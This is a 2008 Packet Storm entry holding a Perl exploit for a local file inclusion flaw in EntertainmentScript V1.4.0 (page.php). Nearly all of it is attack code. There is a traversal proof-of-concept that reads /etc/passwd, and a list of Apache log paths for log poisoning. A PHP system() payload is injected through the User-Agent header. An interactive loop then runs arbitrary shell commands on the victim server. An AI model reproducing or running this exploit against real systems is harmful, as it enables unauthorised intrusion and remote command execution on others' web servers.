entertainment-lfi.txt

2008-05-20T00:00:00
ID PACKETSTORM:66535
Type packetstorm
Reporter Stack-Terrorist
Modified 2008-05-20T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# EntertainmentScript V1.4.0 (( page.php page)) Local File Inclusion Exploit  
########################################  
#[*] Founded & Exploited by : Stack-Terrorist [v40]  
#[*] Contact: Ev!L =>> see down  
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs :)  
# P0c : http://localhost.il/page.php?page=../../../../../etc/passwd%00  
########################################  
#----------------------------------------------------------------------------#  
########################################  
# * TITLE: PerlSploit Class  
# * REQUIREMENTS: PHP 4 / PHP 5  
# * VERSION: v.1  
# * LICENSE: GNU General Public License  
# * ORIGINAL URL: http://www.v4-Team/v4.txt  
# * FILENAME: PerlSploitClass.pl  
# *  
# * CONTACT: dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d )  
# * THNX : AllaH  
# * GREETZ: Houssamix & Djekmani  
########################################  
#----------------------------------------------------------------------------#  
########################################  
use IO::Socket;  
use LWP::Simple;  
########################################  
#--------------------------------------ripped----------------------------------------#  
########################################  
@apache=(  
"../../../../../var/log/httpd/access_log",  
"../../../../../var/log/httpd/error_log",  
"../apache/logs/error.log",  
"../apache/logs/access.log",  
"../../apache/logs/error.log",  
"../../apache/logs/access.log",  
"../../../apache/logs/error.log",  
"../../../apache/logs/access.log",  
"../../../../apache/logs/error.log",  
"../../../../apache/logs/access.log",  
"../../../../../apache/logs/error.log",  
"../../../../../apache/logs/access.log",  
"../logs/error.log",  
"../logs/access.log",  
"../../logs/error.log",  
"../../logs/access.log",  
"../../../logs/error.log",  
"../../../logs/access.log",  
"../../../../logs/error.log",  
"../../../../logs/access.log",  
"../../../../../logs/error.log",  
"../../../../../logs/access.log",  
"../../../../../etc/httpd/logs/access_log",  
"../../../../../etc/httpd/logs/access.log",  
"../../../../../etc/httpd/logs/error_log",  
"../../../../../etc/httpd/logs/error.log",  
"../../.. /../../var/www/logs/access_log",  
"../../../../../var/www/logs/access.log",  
"../../../../../usr/local/apache/logs/access_log",  
"../../../../../usr/local/apache/logs/access.log",  
"../../../../../var/log/apache/access_log",  
"../../../../../var/log/apache/access.log",  
"../../../../../var/log/access_log",  
"../../../../../var/www/logs/error_log",  
"../../../../../var/www/logs/error.log",  
"../../../../../usr/local/apache/logs/error_log",  
"../../../../../usr/local/apache/logs/error.log",  
"../../../../../var/log/apache/error_log",  
"../../../../../var/log/apache/error.log",  
"../../../../../var/log/access_log",  
"../../../../../var/log/error_log"  
);  
########################################  
#----------------------------------------------------------------------------#  
########################################  
if (@ARGV < 3) {  
print "  
===============================================================  
# EntertainmentScript V1.4.0 Local File Inclusion Exploit #  
# perl $0 [Victim] / (apachepath) #  
# Ex:perl $0 [Victim] / ../logs/error.log #  
===============================================================  
# Greetz To: Tryag-Team & v4 Team & H-T Team #  
# by : Stack-Terrorist [v40] #  
===============================================================  
";  
exit();  
}  
########################################  
#----------------------------------------------------------------------------#  
########################################  
$host=$ARGV[0];  
$path=$ARGV[1];  
$apachepath=$ARGV[2];  
########################################  
#----------------------------------------------------------------------------#  
########################################  
print "Code is injecting in logfiles...\n";  
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";  
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";  
print $socket "user-Agent: ".$CODE."\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
close($socket);  
print "Write END to exit!\n";  
print "If not working try another apache path\n\n";  
########################################  
#----------------------------------------------------------------------------#  
########################################  
print "[shell] ";$cmd = <STDIN>;  
while($cmd !~ "END") {  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";  
########################################  
#--------------------------------now include parameter-------------------------#  
########################################  
  
print $socket "GET ".$path."/page.php?page=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\r\n";  
while ($raspuns = <$socket>)  
{  
print $raspuns;  
}  
print "[shell] ";  
$cmd = <STDIN>;  
}  
########################################  
#----------------------Exploited by : Stack-Terrorist [v40]-----------------#  
########################################  
  
`